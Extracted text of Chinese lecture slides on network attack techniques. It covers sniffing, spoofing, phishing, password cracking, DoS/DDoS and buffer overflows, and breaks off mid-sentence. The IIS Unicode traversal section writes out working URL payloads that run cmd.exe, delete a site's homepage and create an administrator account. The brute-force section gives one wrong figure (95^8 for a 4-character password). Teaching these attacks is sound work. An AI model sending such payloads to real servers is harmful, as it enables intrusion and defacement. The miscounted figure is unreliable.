安全與支付4網(wǎng)絡(luò)攻擊技術(shù)

安全與支付第4講網(wǎng)絡(luò)攻擊技術(shù)網(wǎng)絡(luò)攻擊技術(shù)主要內(nèi)容網(wǎng)絡(luò)監(jiān)聽(tīng)攻擊口令攻擊掃描攻擊欺騙攻擊漏洞利用攻擊拒絕服務(wù)攻擊監(jiān)聽(tīng)攻擊網(wǎng)絡(luò)監(jiān)聽(tīng)網(wǎng)絡(luò)監(jiān)聽(tīng)指的是利用計(jì)算機(jī)的網(wǎng)絡(luò)接口捕獲網(wǎng)絡(luò)上傳輸?shù)哪康牡刂窞槠渌?jì)算機(jī)的數(shù)據(jù)報(bào)文。網(wǎng)絡(luò)監(jiān)聽(tīng)工具也常稱作嗅探器，Snifferpro就是一個(gè)功能完善的網(wǎng)絡(luò)監(jiān)聽(tīng)工具監(jiān)聽(tīng)攻擊就是利用嗅探器來(lái)收集網(wǎng)絡(luò)上傳輸?shù)拿舾行畔⒄趥鬏數(shù)挠脩裘蛐庞每ㄌ?hào)、密碼各種非共享機(jī)密數(shù)據(jù)通信主機(jī)的接口地址、TCP連接的字節(jié)順序號(hào)碼以太網(wǎng)監(jiān)聽(tīng)原理在以太網(wǎng)局域網(wǎng)中一臺(tái)計(jì)算機(jī)與其他計(jì)算機(jī)進(jìn)行數(shù)據(jù)交換的時(shí)候，本局域網(wǎng)中的所有計(jì)算機(jī)都會(huì)收到數(shù)據(jù)包，但只有與數(shù)據(jù)包中目標(biāo)地址一致的那臺(tái)主機(jī)才會(huì)接收和處理數(shù)據(jù)包，其它的機(jī)器都會(huì)將包丟棄。但是，當(dāng)主機(jī)工作在監(jiān)聽(tīng)模式下時(shí)，無(wú)論接收到的數(shù)據(jù)包中目標(biāo)地址是什么，主機(jī)都將其接收下來(lái)。然后對(duì)數(shù)據(jù)包進(jìn)行分析，就得到了局域網(wǎng)中通信的數(shù)據(jù)。嗅探器（Sniffer）就是將網(wǎng)卡設(shè)置為混雜模式，目的是使網(wǎng)絡(luò)接口處于監(jiān)聽(tīng)狀態(tài)，從而可接收網(wǎng)絡(luò)上傳輸?shù)拿恳粋€(gè)數(shù)據(jù)包。網(wǎng)絡(luò)監(jiān)聽(tīng)常用Sniffer工具除了非常著名的監(jiān)聽(tīng)軟件SnifferPro外，還有一些常用的監(jiān)聽(tīng)軟件：Unix、Linux：Sniffit、TcpdumpWindows系統(tǒng):Iris、NetworkMonitor

免費(fèi)Ethereal：密碼監(jiān)聽(tīng)工具WinSniffer：監(jiān)聽(tīng)局域網(wǎng)內(nèi)密碼

pswmonitor：監(jiān)聽(tīng)Web郵箱密碼、POP3郵箱密碼、Ftp登錄密碼等8如何發(fā)現(xiàn)和防范sniffer網(wǎng)絡(luò)通訊掉包率反常的高。網(wǎng)絡(luò)帶寬將出現(xiàn)異常。對(duì)于懷疑運(yùn)行監(jiān)聽(tīng)程序的主機(jī)，用正確的IP地址和錯(cuò)誤的物理地址去PING，正常的機(jī)器不接受錯(cuò)誤的物理地址，處于監(jiān)聽(tīng)狀態(tài)的機(jī)器能接受，這種方法依賴系統(tǒng)的IPSTACK，對(duì)有些系統(tǒng)可能行不通。往網(wǎng)上發(fā)大量包含著不存在的物理地址的包,由于監(jiān)聽(tīng)程序?qū)⑻幚磉@些包，將導(dǎo)致性能下降，通過(guò)比較前后該機(jī)器性能（icmpechodelay等方法）加以判斷9如何發(fā)現(xiàn)和防范sniffer2．對(duì)網(wǎng)絡(luò)監(jiān)聽(tīng)的防范措施從邏輯或物理上對(duì)網(wǎng)絡(luò)分段

其目的是將非法用戶與敏感的網(wǎng)絡(luò)資源相互隔離，從而防止可能的非法監(jiān)聽(tīng)。

以交換式集線器代替共享式集線器，使單播包僅在兩個(gè)節(jié)點(diǎn)之間傳送，從而防止非法監(jiān)聽(tīng)。（3）使用加密技術(shù)

數(shù)據(jù)經(jīng)過(guò)加密后，通過(guò)監(jiān)聽(tīng)仍然可以得到傳送的信息,但顯示的是亂碼。（4）劃分VLAN

運(yùn)用VLAN（虛擬局域網(wǎng)）技術(shù)，將以太網(wǎng)通信變?yōu)辄c(diǎn)到點(diǎn)通信，可以防止大部分基于網(wǎng)絡(luò)監(jiān)聽(tīng)的入侵。

欺騙攻擊IP欺騙偽造他人的源IP地址，利用正常信任關(guān)系發(fā)動(dòng)的攻擊ARP欺騙偽造IP地址和MAC地址的對(duì)應(yīng)關(guān)系DNS欺騙讓DNS服務(wù)器的緩存中存在錯(cuò)誤的IP地址映射Web欺騙（釣魚攻擊）假冒的web站點(diǎn)，騙取用戶的機(jī)密信息如04年10月發(fā)生的“網(wǎng)絡(luò)銀行”欺詐(網(wǎng)絡(luò)釣魚攻擊)IP欺騙攻擊IP欺騙攻擊13IP欺騙的防止（1）拋棄基于地址的信任策略（2）進(jìn)行包過(guò)濾（3）使用加密方法（4）使用隨機(jī)化的初始序列號(hào)DNS欺騙攻擊DNS欺騙攻擊DNS特性DNS對(duì)其本身無(wú)法解析的域名會(huì)自動(dòng)向其他DNS服務(wù)器查詢?yōu)樘岣咝蔇NS會(huì)將查詢結(jié)果存入緩存DNS欺騙的基本思路讓DNS服務(wù)器的緩存中存有錯(cuò)誤的IP地址映射攻擊者要做兩件事：偽造一個(gè)用戶的DNS請(qǐng)求偽造一個(gè)查詢應(yīng)答DNS欺騙攻擊網(wǎng)絡(luò)釣魚攻擊網(wǎng)絡(luò)釣魚(Phishing)一詞，是“Fishing”和“Phone”的綜合體，由于黑客始祖起初是以電話作案，所以用“Ph”來(lái)取代“F”，創(chuàng)造了”Phishing”攻擊者利用欺騙性的電子郵件和偽造的Web站點(diǎn)來(lái)進(jìn)行詐騙活動(dòng)，誘騙訪問(wèn)者提供一些個(gè)人信息，如信用卡號(hào)、賬戶和口令、社保編號(hào)等內(nèi)容（通常主要是那些和財(cái)務(wù)，賬號(hào)有關(guān)的信息，以獲取不正當(dāng)利益），受騙者往往會(huì)泄露自己的機(jī)密數(shù)據(jù)網(wǎng)絡(luò)釣魚攻擊釣魚者入侵初級(jí)服務(wù)器，竊取用戶的名字和郵件地址釣魚者發(fā)送有針對(duì)性質(zhì)的郵件受害用戶訪問(wèn)假冒網(wǎng)站受害用戶提供秘密，用戶信息被釣魚者取得釣魚者使用受害用戶的身份進(jìn)入其他網(wǎng)絡(luò)服務(wù)器如04年10月發(fā)生的“網(wǎng)絡(luò)銀行”欺詐(網(wǎng)絡(luò)釣魚攻擊)工行：—中國(guó)：—漏洞攻擊利用已發(fā)現(xiàn)的系統(tǒng)或應(yīng)用軟件實(shí)現(xiàn)上的漏洞攻擊系統(tǒng)操作系統(tǒng)或應(yīng)用軟件不可避免存在漏洞Windows3.1—300萬(wàn)行代碼Windows2000—5000萬(wàn)行代碼通過(guò)及時(shí)為系統(tǒng)安裝補(bǔ)丁程序，就可以消除系統(tǒng)漏洞。只要是針對(duì)漏洞進(jìn)行攻擊的案例都依賴于系統(tǒng)是否打了相關(guān)的補(bǔ)丁。漏洞攻擊實(shí)例：微軟IIS服務(wù)器的Unicode漏洞攻擊：

Unicode漏洞是2000-10-17發(fā)布的，受影響的版本：MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0

消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴(kuò)展UNICODE字符取代“/”和“\”，而能利用"../"目錄遍歷的漏洞漏洞攻擊Unicode漏洞的檢測(cè)方法：使用掃描工具來(lái)檢測(cè)Unicode漏洞是否存在，用前面介紹的X-Scan來(lái)對(duì)目標(biāo)系統(tǒng)進(jìn)行掃描，目標(biāo)主機(jī)IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以只要是/scripts開(kāi)頭的漏洞都是Unicode漏洞。如下面的掃描結(jié)果，就顯示此服務(wù)器有Unicode漏洞/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\(HTTP:200)漏洞攻擊漏洞攻擊其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個(gè)有執(zhí)行程序權(quán)限的一個(gè)目錄，scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下，C:\Inetput\ScriptC:\Inetput\wwwroot在Windows的目錄結(jié)構(gòu)中，可以使用兩個(gè)點(diǎn)和一個(gè)斜線“../”來(lái)訪問(wèn)上一級(jí)目錄，在瀏覽器中利用“scripts/../../”可以訪問(wèn)到系統(tǒng)盤根目錄，訪問(wèn)“scripts/../../winnt/system32”就訪問(wèn)到系統(tǒng)的系統(tǒng)目錄了，在system32目錄下包含許多重要的系統(tǒng)文件，比如cmd.exe文件，可以利用該文件新建用戶，刪除文件等操作。漏洞攻擊瀏覽器地址欄中禁用符號(hào)“../”，但是可以使用符號(hào)“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語(yǔ)句是執(zhí)行dir命令列出目錄結(jié)構(gòu)。利用該漏洞讀取出計(jì)算機(jī)上目錄列表，比如讀取C盤的目錄，只要在瀏覽器中輸入“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\”得到如下結(jié)果：漏洞攻擊漏洞攻擊利用Unicode漏洞刪除主頁(yè)：利用Unicode可以方便的更改對(duì)方的主頁(yè)，比如現(xiàn)在已經(jīng)知道對(duì)方網(wǎng)站的根路徑在“C:\Initpub\wwwroot”（系統(tǒng)默認(rèn)）下，可以刪除該路徑下的文件“default.asp”來(lái)刪除主頁(yè)，這里“default.asp”文件是IIS的默認(rèn)啟動(dòng)頁(yè)面使用的語(yǔ)句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp漏洞攻擊利用Unicode漏洞拷貝文件：為了是使用方便，利用語(yǔ)句將cmd.exe文件拷貝到scripts目錄，并改名為c.exe，使用的語(yǔ)句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe程序執(zhí)行結(jié)果如圖所示。漏洞攻擊利用Unicode漏洞入侵系統(tǒng)：在瀏覽器地址欄上執(zhí)行命令，用戶的權(quán)限比較低，像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode漏洞在對(duì)方系統(tǒng)建立管理員賬號(hào)可以通過(guò)下面一系列操作在對(duì)方主機(jī)創(chuàng)建一個(gè)有管理員權(quán)限的用戶36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+1234+/add+>c:\inetpub\scripts\hack.bat36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+/active:yes+>>c:\inetpub\scripts\hack.bat漏洞攻擊然后通過(guò)以下方式運(yùn)行hack.bat文件

36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.bat

選擇打開(kāi)，通過(guò)以上4步則在服務(wù)器上添加了一個(gè)管理員權(quán)限用戶hacker，密碼是1234口令攻擊口令攻擊是指把口令破解出來(lái)、獲取口令、或者讓口令保護(hù)失效。主要技術(shù)：字典攻擊暴力攻擊其它方法嗅探分析木馬竊取社交欺騙口令攻擊字典攻擊攻擊者基于某些知識(shí)構(gòu)造口令字符串，生成口令字典，然后利用字典里的這些可能的字符串來(lái)測(cè)試密碼目的是縮小嘗試的范圍，高效快速的得到系統(tǒng)的密碼。一個(gè)字典文件本身就是一個(gè)標(biāo)準(zhǔn)的文本文件，其中的每一行就代表一個(gè)可能的密碼?？诹罟艨诹钭值涞臉?gòu)造方法口令攻擊暴力攻擊：通過(guò)窮舉的方法，使用所有可能口令的字符組合逐一測(cè)試，也稱窮舉攻擊。比如先從字母a嘗試，嘗試aa、ab、ac…然后再嘗試aaa、aab、aac…實(shí)例：利用軟件GetNTUser破解密碼，如圖：口令攻擊口令攻擊口令攻擊軟件口令攻擊口令攻擊軟件37設(shè)置安全的口令

在一個(gè)安全的口令里應(yīng)該包含大小寫字母、數(shù)字、標(biāo)點(diǎn)、空格、控制符等，另外口令越長(zhǎng)，攻擊的難度越大。假設(shè)每秒鐘測(cè)試一百萬(wàn)次，用小寫字母組成的4字符口令，窮舉攻擊需要的最大次數(shù)為26^4，窮舉搜索僅需要0.5秒；由所有可輸入字符構(gòu)成的4字符口令，則需要95^8次窮舉，搜索需要的時(shí)間為1.4分鐘，而8字符口令，則要95^8次窮舉，搜索需要的時(shí)間為210年。隨著硬件速度的不斷提高以及互聯(lián)網(wǎng)強(qiáng)大的分布計(jì)算能力，口令很難真正抵抗住窮舉攻擊的威脅。許多人設(shè)置口令時(shí)喜歡使用生日、名字、電話號(hào)碼、身份證號(hào)碼、地名、常用單詞等，這樣的口令固然便于記憶，但安全性極差。字典攻擊對(duì)于這樣的弱口令很奏效。38設(shè)置安全的口令口令的選擇：字母數(shù)字及標(biāo)點(diǎn)的組合，如：Ha,Pp@y!和w/(X,y)*;使用一句話的開(kāi)頭字母做口令，如：由Afoxjumpsoveralazydog!產(chǎn)生口令A(yù)fJoAld!?？诹畹谋４妫河涀?、放到安全的地方，加密最好?？诹畹氖褂茫狠斎肟诹畈灰寗e人看到；不要在不同的系統(tǒng)上使用同一口令；定期改變口令。39一次性口令（OTP，One-TimePassword）。一個(gè)口令僅使用一次，能有效地抵制重放攻擊OTP的主要思路是：在登錄過(guò)程中加入不確定因素，使每次登錄過(guò)程中的生成的口令不相同?？诹盍斜?，每次登錄使用完一個(gè)口令后就將它從列表明中刪除；用戶也可以使用IC卡或其他的硬件卡來(lái)存儲(chǔ)用戶的秘密信息，這些信息再隨機(jī)數(shù)、系統(tǒng)時(shí)間等參數(shù)一起通過(guò)散列得到一個(gè)一次性口令。拒絕服務(wù)攻擊DoS--DenialofService：凡是能導(dǎo)致合法用戶不能夠訪問(wèn)正常網(wǎng)絡(luò)服務(wù)的行為都是“拒絕服務(wù)攻擊”。DoS最主要的目的是：造成被攻擊服務(wù)器資源耗盡或系統(tǒng)崩潰而無(wú)法提供服務(wù)。服務(wù)本身無(wú)傷害；可使提供服務(wù)的信任度下降，影響公司的聲譽(yù)以及用戶對(duì)網(wǎng)絡(luò)服務(wù)的使用。常見(jiàn)的DoS攻擊：①帶寬攻擊：以極大的通信量沖擊網(wǎng)絡(luò)，使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉。②連通性攻擊：用大量的連接請(qǐng)求沖擊計(jì)算機(jī)，最終導(dǎo)致計(jì)算機(jī)無(wú)法響應(yīng)和處理合法用戶的請(qǐng)求。單一的DoS攻擊一般是采用一對(duì)一的方式，當(dāng)攻擊的計(jì)算機(jī)CPU速度低、內(nèi)存小或網(wǎng)絡(luò)帶寬小等各項(xiàng)性能指標(biāo)不高時(shí)，效果是明顯的。DoS攻擊的分類以消耗目標(biāo)主機(jī)的可用資源為目的（例如：死亡之ping、SYN攻擊、Land攻擊、淚珠攻擊等）以消耗服務(wù)器鏈路的有效帶寬為目的（例如：蠕蟲(chóng)）攻擊者

目標(biāo)主機(jī)SYNSYN/ACKACK等待應(yīng)答SYN：同步SYN/ACK:同步/確認(rèn)ACK：確認(rèn)SYN攻擊的原理（1）....SYN/ACKSYN/ACKSYN/ACKSYNSYNSYN攻擊者目標(biāo)主機(jī)SYNSYN/ACK1nSYN/ACKSYN/ACKSYN/ACKSYN/ACK....等待ACK應(yīng)答.........不應(yīng)答不應(yīng)答重新發(fā)送SYN攻擊的原理（2）以Windows為例SYN攻擊花費(fèi)時(shí)間（秒）累計(jì)花費(fèi)時(shí)間（秒）第一次，失敗33嘗試第1次，失敗69嘗試第2次，失敗1221嘗試第3次，失敗2445嘗試第4次，失敗4893嘗試第5次，失敗96189死亡之pingSYNFloodLand攻擊淚珠（Teardrop）攻擊

行行色色的DoS攻擊1)攻擊者攻擊諸客戶主機(jī)以求分析他們的安全水平和脆弱性。攻擊者各種客戶主機(jī)目標(biāo)系統(tǒng)2)攻擊者進(jìn)入其已經(jīng)發(fā)現(xiàn)的最弱的客戶主機(jī)之內(nèi)(“肉雞”)，并且秘密地安置一個(gè)其可遠(yuǎn)程控制的代理程序(端口監(jiān)督程序demon)。攻擊準(zhǔn)備：安置代理代理程序DDoS(分布式拒絕服務(wù))攻擊（1）

3)攻擊者使他的全部代理程序同時(shí)發(fā)送由殘缺的數(shù)字包構(gòu)成的連接請(qǐng)求送至目標(biāo)系統(tǒng)。攻擊者目標(biāo)系統(tǒng)發(fā)起攻擊：指令攻擊的代理程序4)包括虛假的連接請(qǐng)求在內(nèi)的大量殘缺的數(shù)字包攻擊目標(biāo)系統(tǒng)，最終將導(dǎo)致它因通信淤塞而崩潰。虛假的連接請(qǐng)求DDoS(分布式拒絕服務(wù))攻擊（2）DDoS和DoS小結(jié)DDoS的攻擊策略側(cè)重于通過(guò)很多“僵尸主機(jī)”（被攻擊者入侵過(guò)或可間接利用的主機(jī)）向受害主機(jī)發(fā)送大量看似合法的網(wǎng)絡(luò)包，從而造成網(wǎng)絡(luò)阻塞或服務(wù)器資源耗盡而導(dǎo)致拒絕服務(wù)，分布式拒絕服務(wù)攻擊一旦被實(shí)施，攻擊網(wǎng)絡(luò)包就會(huì)猶如洪水般涌向受害主機(jī)，從而把合法用戶的網(wǎng)絡(luò)包淹沒(méi)，導(dǎo)致合法用戶無(wú)法正常訪問(wèn)服務(wù)器的網(wǎng)絡(luò)資源，因此，拒絕服務(wù)攻擊又被稱之為“洪水式攻擊”，常見(jiàn)的DDoS攻擊手段有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等；DoS則側(cè)重于通過(guò)對(duì)主機(jī)特定漏洞的利用攻擊導(dǎo)致網(wǎng)絡(luò)棧失效、系統(tǒng)崩潰、主機(jī)死機(jī)而無(wú)法提供正常的網(wǎng)絡(luò)服務(wù)功能，從而造成拒絕服務(wù)，常見(jiàn)的DoS攻擊手段有TearDrop、Land、Jolt、IGMPNuker、Boink、Smurf、Bonk、OOB等。緩沖區(qū)溢出（bufferoverflow)攻擊從一個(gè)對(duì)話框說(shuō)起……認(rèn)識(shí)緩沖區(qū)溢出【引例】把1升的水注入容量為0.5升的容量中……第一次大規(guī)模的緩沖區(qū)溢出攻擊是發(fā)生在1988年的Morris蠕蟲(chóng)，它造成了6000多臺(tái)機(jī)器被癱瘓，損失在$100000至$10000000之間，利用的攻擊方法之一就是fingerd的緩沖區(qū)溢出。緩沖區(qū)溢出攻擊已經(jīng)占了網(wǎng)絡(luò)攻擊的絕大多數(shù)，據(jù)統(tǒng)計(jì)，大約80%的安全事件與緩沖區(qū)溢出攻擊有關(guān)。流行的緩沖區(qū)溢出攻擊病毒(1)沖擊波

利用漏洞：RPC緩沖區(qū)溢出135/TCP(2)震蕩波

利用漏洞：LSASS漏洞1025/TCP(3)極速波

利用漏洞：UPNP漏洞445/TCP(4)高波

利用多種漏洞,非常危險(xiǎn)惡意代碼攻擊病毒寄生、感染、